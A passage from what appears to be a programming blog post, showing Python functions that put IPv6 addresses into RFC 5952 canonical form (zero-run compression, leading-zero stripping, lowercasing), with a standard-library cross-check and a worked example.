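    """Second rule: drop leading zeros inside each group ('00C2' -> 'C2'), keeping '::' intact."""
    return ":".join("" if g == "" else (g.lstrip("0") or "0") for g in addr.split(":"))


def canonical(addr):
    """RFC 5952 text form: both rules applied, hex digits in lowercase."""
    return strip_leading_zeros(compress_zero_runs(addr)).lower()


def matches_stdlib(addr):
    """Cross-check against the standard library's canonical form."""
    return canonical(addr) == str(ipaddress.IPv6Address(addr))
```

compress_zero_runs("AD80:0000:0000:0000:ABAA:0000:00C2:0002") gives the article's AD80::ABAA:0000:00C2:0002, and canonical() of the same address gives ad80::abaa:0:c2:2; note that the lone zero group in position 6 is shortened to "0" but never compressed to "::", so the address stays unambiguous.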

 


Origin blog.csdn.net/jazzz98/article/details/131361986